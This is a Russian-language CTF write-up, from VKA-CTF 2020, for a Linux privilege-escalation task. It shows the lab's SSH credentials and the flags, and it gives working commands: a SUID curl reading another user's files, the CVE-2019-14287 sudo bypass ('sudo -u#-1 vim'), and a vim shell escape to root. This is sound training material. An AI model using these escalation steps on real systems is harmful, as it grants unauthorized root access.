Skip to content

Latest commit

 

History

History
61 lines (47 loc) · 2.61 KB

File metadata and controls

61 lines (47 loc) · 2.61 KB

К месту службы прибыл

Событие Название Категория Сложность
VKA-CTF`2020 К месту службы прибыл HTB АБИТУРА/1-3 курс

Описание

Автор: [ 𝕂𝕣𝕒𝕦𝕤𝕖 ]

- Товарищ полковник, лейтенант Байконуров для дальнейшего прохождения воинской службы...

- Да, да, заходи скорее, вот твое рабочее место, вот твое имущество, компьютер, монитор, генеральский сервер... Вот готовый акт о приеме, ставь тут подпись, не мешкай.

- Нет, нет, извините, в академии меня целых пять лет учили как заправлять ракету, жать на кнопку и правильно принимать обязанности при заступлении на новую должность. Дайте ка мне все проверить.

ssh [email protected]

пароль: vZNdVJij7UTQ8zEt

Решение

USER


У утилиты cURL установлен SUID bit, а владелцем данного файла является super-server. Используем это, чтобы читать файлы этого пользователя.

> curl file:///home/super-server/user.txt
vka{wh47_15_5u1d_b17

Флаг:

vka{wh47_15_5u1d_b17}

ROOT


Посмотрим на команды, которые мы может выполнить от имени суперпользователя

$ sudo -l
User reborn may run the following commands on host:
    (ALL, !root) NOPASSWD: /usr/bin/vim

Данная настройка конфигурации является уязвимой для выполнения указанной команды от имени суперпользователя, если установлен SUDO версией меньшей, чем 1.8.28 CVE-2019-14287

$ sudo -u#-1 vim

Далее необходимо получить shell. На сайте gtfobins указано, как это сделать

:set shell=/bin/bash
:shell

Получаем shell с правами суперпользователя и читаем флаг

$ id
uid=0(root) gid=1001(reborn) groups=1001(reborn)

Флаг:

vka{n3v3r_f0r637_CV3}